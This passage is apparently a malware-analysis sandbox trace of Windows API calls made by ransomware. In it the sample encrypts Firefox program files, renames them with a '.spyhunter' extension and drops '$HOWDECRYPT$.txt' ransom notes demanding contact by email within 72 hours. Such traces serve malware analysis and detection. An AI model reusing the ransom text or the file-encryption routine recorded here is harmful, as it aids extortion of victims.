pbBuffer=0x57e7c8) returned 1 [0163.838] GetProcessHeap () returned 0x2c0000 [0163.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0163.838] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x57e7c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x57e7c0*=0x30) returned 1 [0163.838] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\crashreporter.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0163.839] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini") returned 60 [0163.839] StrStrW (lpFirst="crashreporter.ini", lpSrch=".txt") returned 0x0 [0163.839] GetProcessHeap () returned 0x2c0000 [0163.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0163.839] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e784, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e784*=0xfa3, lpOverlapped=0x0) returned 1 [0163.857] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff05d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.858] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xfa3, lpNumberOfBytesWritten=0x57e784, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e784*=0xfa3, lpOverlapped=0x0) returned 1 [0163.858] GetProcessHeap () returned 0x2c0000 [0163.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0163.858] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.858] WriteFile (in: hFile=0xb0, lpBuffer=0x57e7c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e784, lpOverlapped=0x0 | out: lpBuffer=0x57e7c4*, lpNumberOfBytesWritten=0x57e784*=0x4, lpOverlapped=0x0) returned 1 [0163.858] WriteFile (in: hFile=0xb0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e784, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x57e784*=0x30, lpOverlapped=0x0) returned 1 [0163.858] CloseHandle (hObject=0xb0) returned 1 [0163.858] GetProcessHeap () returned 0x2c0000 [0163.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.858] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini.spyhunter") returned 70 [0163.858] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\crashreporter.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\crashreporter.ini.spyhunter")) returned 1 [0163.859] GetProcessHeap () returned 0x2c0000 [0163.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.859] GetProcessHeap () returned 0x2c0000 [0163.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0163.859] GetProcessHeap () returned 0x2c0000 [0163.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec57b8 | out: hHeap=0x2c0000) returned 1 [0163.859] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e7c8 | out: pbBuffer=0x57e7c8) returned 1 [0163.859] GetProcessHeap () returned 0x2c0000 [0163.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0163.859] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x57e7c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x57e7c0*=0x30) returned 1 [0163.859] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\wikipedia.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\wikipedia.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0163.860] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\wikipedia.xml") returned 78 [0163.860] StrStrW (lpFirst="wikipedia.xml", lpSrch=".txt") returned 0x0 [0163.860] GetProcessHeap () returned 0x2c0000 [0163.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0163.860] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e784, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e784*=0x8b2, lpOverlapped=0x0) returned 1 [0163.987] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff74e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.987] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x8b2, lpNumberOfBytesWritten=0x57e784, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e784*=0x8b2, lpOverlapped=0x0) returned 1 [0163.987] GetProcessHeap () returned 0x2c0000 [0163.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0163.987] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.987] WriteFile (in: hFile=0xb0, lpBuffer=0x57e7c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e784, lpOverlapped=0x0 | out: lpBuffer=0x57e7c4*, lpNumberOfBytesWritten=0x57e784*=0x4, lpOverlapped=0x0) returned 1 [0163.987] WriteFile (in: hFile=0xb0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e784, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x57e784*=0x30, lpOverlapped=0x0) returned 1 [0163.987] CloseHandle (hObject=0xb0) returned 1 [0163.987] GetProcessHeap () returned 0x2c0000 [0163.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.987] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\wikipedia.xml.spyhunter") returned 88 [0163.987] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\wikipedia.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\wikipedia.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\wikipedia.xml.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\wikipedia.xml.spyhunter")) returned 1 [0163.988] GetProcessHeap () returned 0x2c0000 [0163.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.988] GetProcessHeap () returned 0x2c0000 [0163.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0163.988] GetProcessHeap () returned 0x2c0000 [0163.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeb5a8 | out: hHeap=0x2c0000) returned 1 [0163.989] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e7c0 | out: pbBuffer=0x57e7c0) returned 1 [0163.989] GetProcessHeap () returned 0x2c0000 [0163.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0163.989] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x57e7b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x57e7b8*=0x30) returned 1 [0163.989] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\bing.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\bing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0163.989] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\bing.xml") returned 73 [0163.989] StrStrW (lpFirst="bing.xml", lpSrch=".txt") returned 0x0 [0163.989] GetProcessHeap () returned 0x2c0000 [0163.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0163.989] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e77c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e77c*=0xb3e, lpOverlapped=0x0) returned 1 [0164.103] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff4c2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.103] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xb3e, lpNumberOfBytesWritten=0x57e77c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e77c*=0xb3e, lpOverlapped=0x0) returned 1 [0164.103] GetProcessHeap () returned 0x2c0000 [0164.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0164.103] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.103] WriteFile (in: hFile=0xb0, lpBuffer=0x57e7bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e77c, lpOverlapped=0x0 | out: lpBuffer=0x57e7bc*, lpNumberOfBytesWritten=0x57e77c*=0x4, lpOverlapped=0x0) returned 1 [0164.103] WriteFile (in: hFile=0xb0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e77c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x57e77c*=0x30, lpOverlapped=0x0) returned 1 [0164.104] CloseHandle (hObject=0xb0) returned 1 [0164.104] GetProcessHeap () returned 0x2c0000 [0164.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0164.104] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\bing.xml.spyhunter") returned 83 [0164.104] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\bing.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\bing.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\bing.xml.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\bing.xml.spyhunter")) returned 1 [0164.105] GetProcessHeap () returned 0x2c0000 [0164.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0164.105] GetProcessHeap () returned 0x2c0000 [0164.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0164.105] GetProcessHeap () returned 0x2c0000 [0164.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee5510 | out: hHeap=0x2c0000) returned 1 [0164.105] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\extensions\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0164.106] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0164.106] WriteFile (in: hFile=0xb0, lpBuffer=0x57e6f3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e81c, lpOverlapped=0x0 | out: lpBuffer=0x57e6f3*, lpNumberOfBytesWritten=0x57e81c*=0x127, lpOverlapped=0x0) returned 1 [0164.107] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0164.107] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e81c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e81c*=0x2ac, lpOverlapped=0x0) returned 1 [0164.107] CloseHandle (hObject=0xb0) returned 1 [0164.107] GetProcessHeap () returned 0x2c0000 [0164.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeb3d8 | out: hHeap=0x2c0000) returned 1 [0164.107] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0164.108] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0164.108] WriteFile (in: hFile=0xb0, lpBuffer=0x57e6ef*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e818, lpOverlapped=0x0 | out: lpBuffer=0x57e6ef*, lpNumberOfBytesWritten=0x57e818*=0x127, lpOverlapped=0x0) returned 1 [0164.108] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0164.108] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e818, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e818*=0x2ac, lpOverlapped=0x0) returned 1 [0164.109] CloseHandle (hObject=0xb0) returned 1 [0164.109] GetProcessHeap () returned 0x2c0000 [0164.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e88b58 | out: hHeap=0x2c0000) returned 1 [0164.109] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e7b8 | out: pbBuffer=0x57e7b8) returned 1 [0164.109] GetProcessHeap () returned 0x2c0000 [0164.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0164.109] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x57e7b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x57e7b0*=0x30) returned 1 [0164.109] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\install.rdf" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\install.rdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0164.113] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\install.rdf") returned 112 [0164.116] StrStrW (lpFirst="install.rdf", lpSrch=".txt") returned 0x0 [0164.116] GetProcessHeap () returned 0x2c0000 [0164.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0164.116] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e774, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e774*=0x54e, lpOverlapped=0x0) returned 1 [0164.117] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffab2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.117] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x54e, lpNumberOfBytesWritten=0x57e774, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e774*=0x54e, lpOverlapped=0x0) returned 1 [0164.117] GetProcessHeap () returned 0x2c0000 [0164.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0164.118] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.118] WriteFile (in: hFile=0xa0, lpBuffer=0x57e7b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e774, lpOverlapped=0x0 | out: lpBuffer=0x57e7b4*, lpNumberOfBytesWritten=0x57e774*=0x4, lpOverlapped=0x0) returned 1 [0164.118] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e774, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x57e774*=0x30, lpOverlapped=0x0) returned 1 [0164.118] CloseHandle (hObject=0xa0) returned 1 [0164.118] GetProcessHeap () returned 0x2c0000 [0164.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0164.118] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\install.rdf.spyhunter") returned 122 [0164.118] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\install.rdf" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\install.rdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\install.rdf.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\install.rdf.spyhunter")) returned 1 [0164.315] GetProcessHeap () returned 0x2c0000 [0164.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0164.315] GetProcessHeap () returned 0x2c0000 [0164.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0164.315] GetProcessHeap () returned 0x2c0000 [0164.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e88a20 | out: hHeap=0x2c0000) returned 1 [0164.315] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e7b0 | out: pbBuffer=0x57e7b0) returned 1 [0164.315] GetProcessHeap () returned 0x2c0000 [0164.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0164.315] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x57e7a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x57e7a8*=0x30) returned 1 [0164.315] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\chrome.manifest" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\chrome.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0164.315] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\chrome.manifest") returned 66 [0164.315] StrStrW (lpFirst="chrome.manifest", lpSrch=".txt") returned 0x0 [0164.315] GetProcessHeap () returned 0x2c0000 [0164.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0164.316] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e76c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e76c*=0x28, lpOverlapped=0x0) returned 1 [0164.316] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffd8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.316] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x57e76c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e76c*=0x28, lpOverlapped=0x0) returned 1 [0164.317] GetProcessHeap () returned 0x2c0000 [0164.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0164.317] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.317] WriteFile (in: hFile=0xa0, lpBuffer=0x57e7ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e76c, lpOverlapped=0x0 | out: lpBuffer=0x57e7ac*, lpNumberOfBytesWritten=0x57e76c*=0x4, lpOverlapped=0x0) returned 1 [0164.317] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e76c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x57e76c*=0x30, lpOverlapped=0x0) returned 1 [0164.317] CloseHandle (hObject=0xa0) returned 1 [0164.317] GetProcessHeap () returned 0x2c0000 [0164.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0164.317] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\chrome.manifest.spyhunter") returned 76 [0164.317] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\chrome.manifest" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\chrome.manifest"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\chrome.manifest.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\chrome.manifest.spyhunter")) returned 1 [0164.318] GetProcessHeap () returned 0x2c0000 [0164.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0164.318] GetProcessHeap () returned 0x2c0000 [0164.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0164.318] GetProcessHeap () returned 0x2c0000 [0164.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e06598 | out: hHeap=0x2c0000) returned 1 [0164.318] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e7b0 | out: pbBuffer=0x57e7b0) returned 1 [0164.318] GetProcessHeap () returned 0x2c0000 [0164.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0164.318] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x57e7a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x57e7a8*=0x30) returned 1 [0164.318] CreateFileW (lpFileName="\\\\?\\C:\\Program Files 